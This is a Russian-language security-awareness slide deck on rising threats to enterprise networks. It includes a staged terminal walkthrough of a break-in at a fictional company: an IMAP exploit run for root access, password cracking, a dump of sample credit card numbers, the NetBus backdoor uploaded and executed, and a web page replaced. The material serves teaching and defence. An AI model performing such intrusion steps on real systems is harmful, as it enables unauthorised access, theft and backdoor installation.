Рост угроз

Содержание

Слайд 2

МСЭ

E-Mail сервер

Web
сервер

Роутер

Рабочие станции

Сеть

Сервера

Типовая схема сегмента корпоративной сети

МСЭ E-Mail сервер Web сервер Роутер Рабочие станции Сеть Сервера Типовая схема сегмента корпоративной сети

Слайд 3

Приложение масштаба предприятия

Приложение масштаба предприятия
различные платформы
использование Internet
разное ПО и аппаратура
различные пользователи
масштабность
интеграция в

Приложение масштаба предприятия Приложение масштаба предприятия различные платформы использование Internet разное ПО
технологию обработки информации

Результат
Данные и системы могут быть:
выведены из строя
украдены
несанкционированно изменены

Слайд 4

Особенности приложений масштаба предприятия

Внешние и внутренние злоумышленники

Управление безопасностью сосредоточено
в разных руках:
администраторы

Особенности приложений масштаба предприятия Внешние и внутренние злоумышленники Управление безопасностью сосредоточено в
безопасности
администраторы баз данных
системные и сетевые администраторы
Web-мастера

Ограниченные ресурсы на обеспечение
безопасности

Слайд 5

Пример приложений масштаба предприятия: SAP

SAP

SAP R/3
Клиент

Приложение R/3
Серверная ОС

База данных R/3

База данных R/3
Серверная

Пример приложений масштаба предприятия: SAP SAP SAP R/3 Клиент Приложение R/3 Серверная
ОС

WinNT
Workstation

NT или Unix

MS SQL Server
или Sybase

NT или Unix

TCP/IP

Слайд 6

Интервал безопасности

Желательный уровень защищенности

Реальный уровень защищенности

Время

Если ничего не делать…

Интервал безопасности Желательный уровень защищенности Реальный уровень защищенности Время Если ничего не делать…

Слайд 7

Интервал безопасности

Интервал безопасности

Слайд 8

Традиционные средства защиты

Традиционные средства защиты

Слайд 9

Компоненты системы безопасности

Компоненты системы безопасности

Слайд 10

Инфраструктура безопасности

Инфраструктура безопасности

Слайд 11

Инфраструктура безопасности

ID

Аутентификация

Johnsmith

************

Admin

Инфраструктура безопасности ID Аутентификация Johnsmith ************ Admin

Слайд 12

Инфраструктура безопасности

85urtiowjeuqp08239574i9476ljbmvnxkdkbmg

85urtiowjeuqp08239574i9476ljbmvnx

8573urtiowjeuqp082
memo

Инфраструктура безопасности 85urtiowjeuqp08239574i9476ljbmvnxkdkbmg 85urtiowjeuqp08239574i9476ljbmvnx 8573urtiowjeuqp082 memo

Слайд 13

Уязвимости


Любая характеристика или свойство информационной системы, использование которой нарушителем может привести

Уязвимости Любая характеристика или свойство информационной системы, использование которой нарушителем может привести
к реализации угрозы.

ошибки в программах;
человеческие ошибки и неправильная
конфигурация
разрешенный, но неиспользуемый
сервис
восприимчивость к атакам типа
«отказ в обслуживании»
ошибки при проектировании

Слайд 14

Угрозы и атаки


Атака - любое действие нарушителя, которое приводит к реализации

Угрозы и атаки Атака - любое действие нарушителя, которое приводит к реализации
угрозы путем использования уязвимостей информационной системы.

Угроза - потенциально возможное событие, действие или процесс, которое посредством воздействия на компоненты информационной системы может привести к нанесению ущерба.

Слайд 15

Информационная инфраструктура

Информационная инфраструктура

Слайд 16

Анатомия атаки

Анатомия атаки

Слайд 18

bigwidget.com

bigwidget.com

Слайд 20

~$ telnet bigwidget.com 25

Trying 10.0.0.28...

Connected to bigwidget.com

Escape character is '^]'.

hacker:

hacker:~$

Connection closed by

~$ telnet bigwidget.com 25 Trying 10.0.0.28... Connected to bigwidget.com Escape character is
foreign host.

telnet bigwidget.com 143

Trying 10.0.0.28...

Connected to bigwidget.com.
* OK bigwidget IMAP4rev1 Service 9.0(157) at Wed, 14 Oct 1998 11:51:50 -0400 (EDT)
(Report problems in this server to [email protected])

. logout

* BYE bigwidget IMAP4rev1 server terminating connection
. OK LOGOUT completed

Connection closed by foreign host.

Слайд 24

hacker ~$

./imap_exploit bigwidget.com

IMAP Exploit for Linux.
Author: Akylonius ([email protected])
Modifications: p1 ([email protected])

Completed successfully.

hacker ~$

telnet

hacker ~$ ./imap_exploit bigwidget.com IMAP Exploit for Linux. Author: Akylonius (aky@galeb.etf.bg.ac.yu) Modifications:
bigwidget.com

Trying 10.0.0.28...

Connected to bigwidget.com.

Red Hat Linux release 4.2 (Biltmore)
Kernel 2.0.35 on an i686

root

bigwidget:~#

whoami

root

bigwidget:~#

cat ./hosts

127.0.0.1 localhost localhost.localdomain
208.21.2.10 thevault accounting
208.21.2.11 fasttalk sales
208.21.2.12 geekspeak engineering
208.21.2.13 people human resources
208.21.2.14 thelinks marketing
208.21.2.15 thesource information systems

bigwidget:~#

cd /etc

bigwidget:~#

rlogin thevault

login:

Слайд 25

Allan B. Smith 6543-2223-1209-4002 12/99
Donna D. Smith 6543-4133-0632-4572 06/98
Jim Smith 6543-2344-1523-5522 01/01
Joseph

Allan B. Smith 6543-2223-1209-4002 12/99 Donna D. Smith 6543-4133-0632-4572 06/98 Jim Smith
L.Smith 6543-2356-1882-7532 04/02
Kay L. Smith 6543-2398-1972-4532 06/03
Mary Ann Smith 6543-8933-1332-4222 05/01
Robert F. Smith 6543-0133-5232-3332 05/99

thevault:~#

cat visa.txt

cd /data/creditcards

thevault:~#

thevault:~#

crack /etc/passwd

Cracking /etc/passwd...

username: bobman password: nambob

username: mary password: mary

username: root password: ncc1701

thevault:~#

ftp thesource

Connected to thesource
220 thesource Microsoft FTP Service (Version 4.0).

Name:

administrator

331 Password required for administrator.

Password:

*******

230 User administrator logged in.

Remote system type is Windows_NT.

Слайд 28

ftp>

cd \temp

250 CDW command successful.

ftp>

send netbus.exe

local: netbus.exe remote: netbus.exe

200 PORT command successful.

150

ftp> cd \temp 250 CDW command successful. ftp> send netbus.exe local: netbus.exe
Opening BINARY mode data connection for netbus.exe

226 Transfer complete.

ftp>

ftp>

quit

thevault:~$

telnet thesource

Trying 208.21.2.160.

.. Connected to thesource.bigwidget.com.

Escape character is '^]'.

Microsoft (R) Windows NT (TM) Version 4.00 (Build 1381)

Welcome to MS Telnet Service
Telnet Server Build 5.00.98217.1
login:

administrator

password:

*******

*===============================================================
Welcome to Microsoft Telnet Server.
*===============================================================
C:\>

cd \temp

C:\TEMP>

netbus.exe

Слайд 30

Сеть BigWidget

UNIX
Firewall

E-Mail сервер

Web сервер

Router

NT

Рабочие станции

сеть

UNIX

NT

UNIX

Сеть BigWidget UNIX Firewall E-Mail сервер Web сервер Router NT Рабочие станции сеть UNIX NT UNIX

Слайд 36

c:\>

ftp webcentral

Connected to webcentral
220 webcentral Microsoft FTP Service (Version 4.0).

Name:

jsmith

331 Password required

c:\> ftp webcentral Connected to webcentral 220 webcentral Microsoft FTP Service (Version
for jsmith.

Password:

*******

230 User jsmith logged in.

Remote system type is Windows_NT.

ftp>

send index.html

local: bigwedgie.html remote: index.html

200 PORT command successful.

150 Opening BINARY mode data connection for index.html

226 Transfer complete.

ftp>

ftp>

quit

200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
total 10
-rwxr-xr-x 9 jsmith jsmith 1024 Aug 17 17:07 .
-rwxr-xr-x 9 root root 1024 Aug 17 17:07 ..
-rwxr-xr-x 2 jsmith jsmith 2034 Aug 17 17:07 index.html
-rwxr-xr-x 2 jsmith jsmith 1244 Aug 17 17:07 image1.gif
-rwxr-xr-x 2 jsmith jsmith 10244 Aug 17 17:07 image2.gif
-rwxr-x--x 6 jsmith jsmith 877 Aug 17 17:07 title.gif
-rwxr-xr-x 2 jsmith jsmith 1314 Aug 17 17:07 bigwidget.jpg
-rwxr-xr-x 2 jsmith jsmith 1824 Aug 17 17:07 page2.html
226 Transfer complete. bytes received in 0.82 seconds (0.76 Kbytes/sec)

ftp>

dir

Слайд 38

UNIX
Firewall

E-Mail сервер

Web сервер

Router

NT

Рабочие станции

Сеть

UNIX

NT

UNIX

UNIX Firewall E-Mail сервер Web сервер Router NT Рабочие станции Сеть UNIX NT UNIX
Имя файла: Рост-угроз.pptx
Количество просмотров: 152
Количество скачиваний: 0